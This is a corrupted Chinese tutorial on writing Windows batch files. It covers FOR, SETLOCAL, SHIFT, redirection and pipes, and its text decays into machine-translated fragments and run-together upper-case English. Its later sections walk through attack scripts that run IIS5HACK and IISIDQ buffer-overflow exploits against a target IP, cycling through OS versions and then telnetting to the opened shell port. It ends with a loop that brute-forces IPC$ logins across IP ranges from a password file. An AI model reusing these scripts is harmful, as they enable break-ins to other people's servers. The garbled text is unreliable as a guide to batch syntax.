编写批处理文件（writing batch files）

编写批处理文件（WRITINGBATCHFILES）蝙蝠转到1回声文件存在成功去退出一回声文件不存在失败去退出出口这个批处理大家可以放在C盘和D盘分别执行看看效果。7、为对于这个命令比较特殊是一个循环执行命令的命令，同时为的循环里面还可以套用为在进行循环。这篇我们介绍基本的用法就不做套用的循环了，后面再来讲解套用的循环在批处理中为的命令如下在SET中做命令参数在命令行中命令如下在SET中做命令参数常用参数我该集表示以增量形式从开始到结束的一个数字序列。因此，（三）将产生序列12345，（5，1）将产生序列（54321）。D如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。F从指定的文件中读取数据作为变量EOLC指一个行注释字符的结尾（就一个）跳过N指在文件开始时忽略的行数。DELIMSXXX指分隔符集。这个替换了空格和跳格键的默认分隔符集。标记为X，Y，M指每行的哪一个符号被传递到每个迭代的为本身。这会导致额外变量名称的分配。MN格式为一个范围。通过N符号指定如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本M。USEBACKQ指定新语法已在下类情况中使用在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在FILENAMESET中使用双引号扩起文件名称。下面来看一个例子FEOL；令牌2,3DELIMS，我（MYFILETXT）”KJ我的回声会分析MYFILETXT中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给为程序体；用逗号和或空格定界符号。请注意，为程序体的语句引用我来取得第二个符号这个，引用J来取得第三个符号，引用K来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用USEBACKQ选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。我专门在为语句中得到说明，J和K是通过令牌选项专门得到说明的。您可以通过令牌一行指定最多26个符号，只要不试图说明一个高于字母ZZ或的变量。请记住，为变量名分大小写，是通用的；而且，同时不能有52个以上都在使用中。F分析逻辑您还可以在相邻字符串上使用；方法是，用单引号将括号之间的FILENAMESET括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，F命令来分析命令的输出您可以用。方法是，将括号之间的FILENAMESET变成一个反括字符串。该字符串会被当作命令行，传递到一个子CMDEXE，其输出会被抓进内存，并被当作文件分析因此，以下例子。FUSEBACKQDELIMS（我在集）做“回声I会枚举当前环境中的环境变量名称。以下列举一个简单的例子，他将说明参数L和没有参数的区别删除文件1TXT2TXT3TXT4TXT5TXT例ECHOOFFFORFINL1,1,5DOFTXTDEL或FORFIN1,2,3,4,5DOFTXTDEL以上2条命令执行的结果都是一样的如下CDEL1TXTCDEL2TXTCDEL3TXTCDEL4TXTCDEL5TXT8、SETLOCAL开始批处理文件中环境改动的本地化操作在执行SETLOCAL之后所做的环境改动只限于批处理文件要还原原先的设置,必须执行ENDLOCAL达到批处理文件结尾时,对于该批处理文件的每个尚未执行的SETLOCAL命令,都会有一个隐含的ENDLOCAL被执行例ECHOOFFSETPATH察看环境变量PATHPAUSESETLOCALSETPATHETOOLS重新设置环境变量PATHSETPATHPAUSEENDLOCALSETPATH从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径被设置成了ETOOLS后显示为ETOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径但这个设置只在该批处理运行的时候有作用当批处理运行完成后环境变量PATH将会还原9、SHIFTSHIFT命令可以让在命令上的的命令使用超过10个09以上的可替代参数例ECHOOFFECHO,1,2,3,5,4,6,7,8,9SHIFTECHO,1,2,3,5,4,6,7,8,9SHIFTECHO,1,2,3,5,4,6,7,8,9执行结果如下CSHIFTBAT1234567891011123456789234567891034567891011以上就是基于WIN2000下的9个批处理命令第二部分特殊的符号与批处理在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义1、符号在批处理中的意思是关闭当前行的回显我们从上面知道用命令ECHOOFF可以关掉整个批处理的命令回显但却不能不显示ECHOOFF这个命令现在我们在这个命令前加上关闭了回显从而达到所有命令均不回显得要求这样ECHOOFF这一命令就被2、符号的意思是传递并覆盖他所起的作用是将运行后的回显结果传递到后面的范围例后面可是文件也可是默认的系统控制台文件1TXT的文件内容为11使用命令CDIRTXT1TXT这时候1TXT的内容如下驱动器C中的卷没有标签卷的序列号是301A1508C的目录200303111404FRUNLOGTXT10052003040418598494LOGTXT16382003040451TXT1702200303120AIERRORLOGTXT11432003033030571202108TXT00355个文件18630070字节个目录1191542784可用字节0将命令执行的结哺橇嗽嫉奈募谌荨在传递给控制台的时候程序将不会有任何回显注意这里的回显跟ECHOOFF关掉的回显不是同一概念ECHOOFF关掉的是输入命令的回显,例这里的回显是程序执行中或后的回显CDIRTXTNUL程序将没有任何显示也不会产生任何痕迹3、符号符号的作用与符号相似,但他们的区别在于是传递并在文件末尾追加也可将回显传递给控制台例用法同上文件1TXT内同为11使用命令CDIRTXT1TXT这时候1TXT的内容如下11THEVOLUMEINTHEDRIVECISNOTMARKEDTHESERIALNUMBEROFTHEVOLUMEIS301A1508CDIRECTORY2003031114041005,FRUNLOGTXT20030404163818598494,LOGTXT2003040417025,1TXT2003031211430,AIERRORLOGTXT20030330003530571,202108TXT5FILES,18630070BYTES0DIRECTORIES,1191542784BYTESAVAILABLETHERESULTOFTHECOMMANDEXECUTIONISADDEDTOTHEORIGINALFILECONTENT4,SYMBOLSISAPIPELINETRANSFERCOMMANDTHATMEANSPASSINGTHERESULTSOFTHELASTCOMMANDTOTHENEXTCOMMANDCASESCDIRCFIND1508THESERIALNUMBEROFTHEVOLUMEIS301A1508THEABOVECOMMANDMEANSTOFINDALLOFTHECANDFINDTHE1508STRINGFINDUSAGE,PLEASEUSEFINDTOSEEFORYOURSELFTHISISHOWIFORMATTHEDISKAUTOMATICALLYWITHOUTUSINGFORMATSAUTOFORMATTINGPARAMETERSECHO,YFORNAT,A,S,Q,VSYSTEMANYONEWHOHASUSEDTHEFORMATCOMMANDKNOWSTHATFORMATHASANINTERACTIONPROCESS,WHICHREQUIRESTHEUSERTOENTERYTODETERMINEWHETHERTHECURRENTCOMMANDISEXECUTEDBEFORETHISCOMMAND,ADDECHOYANDUSETHEPIPELINETRANSPORTCHARACTERSTOPASSTHERESULTSOFTHEECHOYTOFORMATTOACHIEVETHEPURPOSEOFMANUALLYENTERINGTHEYTHISCOMMANDISHARMFULANDBECAREFULWHENYOUTESTIT5,SYMBOLSISALEADINGCHARACTERFORASPECIALSYMBOL,DEFTHEABOVECOMMANDISEQUIVALENTTODIRCDIRDDIREDIRFOFCOURSE,THEREARESOMESPECIALSYMBOLS,BUTTHEIRSCOPEOFUSEISVERYSMALL,NOLONGERHEREONEBYONEINSTRUCTIONSTHETHIRDPARTDEALSWITHBATCHANDVARIABLESINBATCH,THEAPPROPRIATEREFERENCEVARIABLEWILLMAKEYOURPROGRAMMOREWIDELYUSEDBATCHPROCESSINGCANPROCESSVARIABLESFROM09TO10ATATIMEWHERE0DEFAULTSTOTHEBATCHFILENAMEUSED0CANNOTBEREPLACEDBY1UNLESSTHESHIFTCOMMANDISUSEDCITINGTHEEXAMPLEOFTHESHIFTCOMMAND,IFYOUADDA0TOTHEFRONTOFTHE1,THERESULTISASFOLLOWSCSHIFTBAT1234567891011SHIFTBAT12345678912345678,91023456789,1011THESYSTEMISHOWTODISTINGUISHEACHVARIABLE,THESYSTEMVARIABLESOFDIFFERENTRULESFORTHEMIDDLEOFTHESTRINGSPACE,ASLONGASTHESPACEFOUNDPRECEDINGTHESPACECHARACTERASAVARIABLEANDTHESPACEBEHINDTHECHARACTERASANOTHERVARIABLEIFYOURVARIABLEISALONGDIRECTORYNAMEWITHSPACESINIT,YOUNEEDTOENCLOSEITWITHQUOTATIONMARKSINTHEPREVIOUSSECTIONOFTHESPECIALSYMBOL8CASESBATCHCONTENTISECHO1ECHO2ECHO3INPUTCOMMANDCTEST“PROGRAMFILES“PROGRAMFILESPROGRAMFILESPROGRAMFILESINACOMPLEXBATCH,THEREAREMORETHAN10VARIABLESTHATMAYBEUSEDATTHESAMETIMETHISWILLCONFLICTWITHTHERULESOFTHESYSTEMHOWCANTHISPROBLEMBESOLVEDTHEREISALSOAVARIABLECALLEDTHEENVIRONMENTVARIABLEINTHESYSTEMUSINGTHESETCOMMANDTOVIEWTHEENVIRONMENTVARIABLESOFTHECURRENTSYSTEM,SUCHASTHECURRENTSYSTEMDIRECTORYISWINDIRORSYSTEMROOTWHENWEUSEMORETHAN10ARGUMENTSATTHESAMETIME,WECANSAVEVARIABLESTHATAREALSOCALLEDINTHESUBSEQUENTPROGRAMASENVIRONMENTVARIABLESFORSPECIFICUSESSUCHASSETA1,WENAMEANEWENVIRONMENTVARIABLE,A,CALLEDAWHENCALLINGTHEVARIABLEA,ANDTHEENVIRONMENTVARIABLEISNOTAFFECTEDBYTHESHIFTCOMMANDIFYOUWANTTOCHANGEANENVIRONMENTVARIABLE,YOUNEEDTORESETITTOCHANGEITOFCOURSE,YOUCANALSOPASSBETWEENVARIABLESANDVARIABLESTOACHIEVETHEGOALLETSLOOKATANEXAMPLEOFBATCHPROCESSINGASFOLLOWSECHOOFFSETPASS1SHIFTSETPASS11SHIFTECHO,PASS,PASS1,1,2,3,4,5,6,7,8,9SHIFTECHOPASSPASS19THETRANSFEROFSETPASSPASS1VARIABLESSETPASS19SHIFTECHOPASSPASS19USINGTHECOMMANDCTESTAB345678910KLAB345678910KNOTETHISLINESHOWS11VARIABLESABL,AFTERUSING3SHIFT,9BECAMELTHEOUTCOMEOFTHETRANSFEROFTHEBLVARIABLETHEFOURTHPARTCOMPLETECASETHESEARESOMEOFTHEUSESOFBATCHPROCESSINGNOWLETSCOMBINETHESEUSESTOANALYZEINDETAILSOMEOFTHECURRENTONLINERELEASESANDSEEHOWTHEYWORKHEREILLGIVEYOUTHREEEXAMPLESTOANALYZEINDETAILINORDERTOKEEPTHEPROGRAMCOMPLETE,MYCOMMENTSWILLBEADDEDLATERACASETHISEXAMPLEISTHEUSEOFIIS5HACKEXEFORDEALINGWITHOVERFLOWOFHOSTSWITHPRINTERVULNERABILITIESTHEPROCEDURESUSEDAREIIS5HACKEXEANDTHESYSTEMCOMESWITHTELNETEXEIIS5HACKSCOMMANDFORMATISIIS5HACKTARGETIPTARGETPORTTARGETVERSIONOFTHETARGETVERSIONFOROVERFLOWPORTSYSTEMVERSION0910DIGITSCORRESPONDINGTOTHEDIFFERENTLANGUAGEVERSIONSANDSP,WEUSETHECOMMANDFORMATBATCHPREPARATIONOFIISBATTARGETIPSTARTVERSIONNUMBERTOVERSIONNUMBERISNOTESSENTIALPROCEDURESAREASFOLLOWSECHOOFFSHUTDOWNCOMMANDECHOTHEIF1GOTOHELPDETERMINESWHETHERTHE1ISEMPTYAND1ISTHETARGETIPIF21GOTO1DETERMINESWHETHERTHE2IS1,OR1,ANDTHEJUMPFLAG1IF22GOTO22ISTHESTARTVERSIONNUMBER,IFNOTSETIF23GOTO3,IFITEXISTS,STARTSEXECUTIONFROMTHEMATCHIF24GOTO4IF25GOTO5IF26GOTO6IF27GOTO7IF28GOTO8IFNOTEXISTIIS5HACKEXEGOTOFILEDOESNOTFINDIIS5HACKEXETOEXECUTETHEFLAGFILESEGMENTCONTENTPING,1,N,1,FIND,RECEIVED1,PING,TARGET1TIMES,RECEIVED1FROMTHERESULTIFERRORLEVEL1GOTOERROR,IFTHERETURNCODEIS1,THENTHEERRORSEGMENTISEXECUTEDCODE1ISNOTFOUND,0ISFOUNDANDSUCCESSFULLYEXECUTEDIIS5HACK180988809溢出后连接端口找到好的开始溢出目标端口系统代码88在执行结果中发现字符串“好”（溢出成功后才会有字符串好）如果不是ERRORLEVEL1转到TELNET如果没有错误代码1（溢出成功）就执行TELNET段的内容。9失败回声操作系统类型否则显示这一句8以下代码内容参照上面IIS5HACK180888找好如果不是ERRORLEVEL1转到TELNET8失败回声操作系统类型七IIS5HACK180788找好如果不是ERRORLEVEL1转到TELNET7失败回声操作系统类型六IIS5HACK180688找好如果不是ERRORLEVEL1转到TELNET6失败回声操作系统类型五IIS5HACK180588找好如果不是ERRORLEVEL1转到TELNET5失败回声操作系统类型四IIS5HACK180488找好如果不是ERRORLEVEL1转到TELNET4失败回声操作系统类型三IIS5HACK180388找好如果不是ERRORLEVEL1转到TELNET3失败回声操作系统类型二IIS5HACK180288找好如果不是ERRORLEVEL1转到TELNET2失败回声操作系统类型一IIS5HACK180188找好如果不是ERRORLEVEL1转到TELNET1失败回声操作系统类型零IIS5HACK180088找好如果不是ERRORLEVEL1转到TELNET0失败回声操作系统类型跳转错误TELNETTELNET188开始连接目标IP的88端口去连接中断后跳转段退出退出错误谬误段显示错误后的帮助信息回声可能网络不能连接或者对方以修补该漏洞请按照下面的格式手工尝试一次回声IIS5HACK目标IP网站端口系统类型开放端口回声中文0回声中文SP11回声英文2回声英文SP13回声日语4回声日语SP15回声韩文6回声韩文SP17回声墨西哥语8回声墨西哥语SP19去跳转段退出退出文件段显示文件没有发现的信息回声文件IIS5HACKEXE没有发现程序终止运行去跳转段退出退出帮助段显示本批处理的使用格式帮助回声本程序用法如下回声目标IISIP回声目标IISIP开始的号码90退出段为程序出口这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大例二这个例子是用IISIDQEXE对有IDQ漏洞的机器进行溢出的批处理。使用的程序有IISIDQEXE和系统自带的程序TELNETEXE。IISIDQEXE的用法如下运行参数操作系统类型目的地址WEB端口1溢出监听端口输入命令1其中，如果输入命令参数没有输入，那么，默认为CMDEXE。其中操作系统类型类型的代码范围是014。我们编制的批处理使用的命令格式为IDQBAT目标IP程序如下回音同例一如果不存在IISIDQEXE转到文件同例一如果1转到错误同例一平1N11同例一找得到如果1到同例一ERRORLEVEL错误值1套餐B1创建一个环境变量B，PASSTHECONTENTSOFTHEVARIABLE1TOTHEENVIRONMENTVARIABLEBTHECONTENTOFTHEVARIABLEBWILLBETHETARGETIPLATERSETA0CREATESANENVIRONMENTVARIABLE,A,ANDSPECIFIESTHEENVIRONMENTVARIABLEA0USINGAASACOUNTERBECAUSEOFTHEENTIREBATCHCYCLENONOBEGINSIFA0SETD0,IFTHEENVIRONMENTVARIABLEA0CREATESTHEENVIRONMENTVARIABLE,DSETSTHEENVIRONMENTVARIABLED0THEIFA1SETD1ENVIRONMENTVARIABLEDISACTUALLYTHEOPERATINGSYSTEMTYPECODETHATUSESCOUNTERSTOCONTROLITIF,A2,SET,D2CHANGESIFA3SETD3IFA4SETD4IFA5SETD5IFA6SETD6IFA7SETD7IFA9SETD9IFA10SETD13IFA11SETD14WHENTHEGOTO0VARIABLEISCOMPLETE,GOTOSIGN0ONEECHOISEXECUTINGITEMDCANNOTCONNECTWITHDESTINATIONBTRYINGTOCONNECTPLEASEWAIT0MARK0BEGINSIISIDQDB80199FINDGOODSENDSOVERFLOWCOMMANDSINFORMATANDFINDSSTRINGGOODINTHERESULTSENTCODESUCCESSFULLYTOHAVESTRINGGOODIFERRORLEVEL1GOTO1,IFTHEREISNOGOODSTRING,NOJUMPISSENTCONTINUETRYINGTOSENDATFLAG1PING127001N8NULPINGITSELF8TIMES,EQUIVALENTTO8SECONDSDELAY,DONOTSHOWTHEEXECUTIVELINERESULTSECHOISEXECUTINGITEMDREPORTINGTHETYPEOFOPERATINGSYSTEMTHATISOVERRUNTELNETB99CONNECTIONOVERFLOWPORTECHODISPLAYSANEMPTYLINEIFD14GOTOERROR1,IFTHEOPERATINGSYSTEMTYPEIS14,THENJUMPERROR1LOOPEXITIFD13SETA11BEGINSTOREUSETHEOPERATINGSYSTEMCODEWITHCOUNTERSIFD9SETA10IFD7SETA9IFD6SETA7IFD5SETA6IFD4SETA5IFD3SETA4IFD2SETA3IFD1SETA2IFD0SETA1THEGOTONOVALUECOMPLETESTHEJUMPNOSEGMENTEXECUTIONFILEBELOWAREHELPPROMPTSAFTERANERRORECHOIISIDQEXEISNOTFOUNDPUTTHISFILEINTHESAMEDIRECTORYASTHISFILEGOTOEXITERRORECHOERRORTHETARGETIPISNOTRECOGNIZEDPLEASEUSETHEFOLLOWINGFORMATTOCONNECTECHOIDQTARGETIPGOTOEXITERROR1THEECHOCONNECTIONFAILEDTHETARGETMACHINEMAYHAVEPATCHEDTHISVULNERABILITYORNETWORKFAULTECHOPLEASETRYMANUALLYINTHEFORMATBELOWECHOIISIDQTARGETTYPETARGETIPDESTINATIONPORTCONNECTIONOVERFLOWPORTECHOTELNETTARGETIPOVERFLOWPORTEXITEXPORTSOFTHEENTIREPROGRAMTHISBATCHPROCESSTAKESTHEOVERALLLOOPWELL,ANDTHECOUNTERSECTIONTAKESCAREOFTHISBATCHINTHREECASESFOR,L,A,IN0,1255,DO,L,B,IN0,1255,DO,FOR,C,IN1,1254,DO,FOR,F,TOKENS1,2,E,INUSERPASSTXT,DO,L,NET,FOR,USE,1ABCIPC,E,UFTHECOMMANDABOVEIS1COMMANDSASYOUCANSEE,THECOMMANDUSES4FORTOAPPLYUSAGECTESTBAT218WHENTHEINPUT218ENTERTHECOMMANDBYFIRSTFORFROMTHEINITIALVALUEOF0FORAANDTHENCONTINUETOTAKESECONDOFT